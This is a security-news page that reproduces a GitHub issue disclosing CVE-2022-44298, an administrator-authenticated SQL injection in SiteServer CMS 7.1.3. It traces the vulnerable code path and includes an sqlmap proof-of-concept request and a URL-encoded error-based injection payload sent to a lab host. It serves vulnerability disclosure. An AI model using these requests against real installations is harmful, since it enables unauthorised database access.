Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44298: background admin sql inject · Issue #3492 · siteserver/cms

SiteServer CMS 7.1.3 is vulnerable to SQL Injection.

CVE
Open in Source
#sql#vulnerability#web#windows#apple#js#java#auth#ibm#chrome#webkit

Vulnerability conditions
SSCMS v7.1.3 +mysql+administrator privileges
Vulnerability details

  1. Discover the entry through code auditing
    SSCMS.Web/Controllers/Admin/Settings/Sites/SitesTablesController.GetColumns.cs exists tablename SQL statement call

2. Called the GetCount method of SSCMS.Core/Services/DatabaseManager.cs

3. After entering the Quote method of SSCMS.Core/Services/DatabaseManager.Parser.cs

4、Call Database.cs(GetQuotedIdentifier)->DbUtils.cs(GetQuotedIdentifier)->MySqlImpl.cs(GetQuotedIdentifier) ​​in turn Finally, the returned result has not yet been filtered and other operations on the sql statement

` GET /api/admin/settings/sitesTables/1* HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Referer: http://192.168.3.129/utils/search.html?word=1111 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Connection: close ` poc in sqlmap

poc in burp
GET /api/admin/settings/sitesTables/%31%25%27%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%36%38%36%31%37%36%36%35%32%30%37%33%37%31%36%63%32%30%36%39%36%65%36%61%36%35%36%33%37%34%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%34%32%33%38%3d%34%32%33%38%2c%31%29%29%29%2c%30%78%37%31%36%62%37%31%36%62%37%31%29%2c%34%32%33%38%29%20%41%4e%44%20%27%72%6a%62%67%25%27%3d%27%72%6a%62%67 HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/plain, / Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Referer: http://192.168.3.129/ss-admin/?siteId=57 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE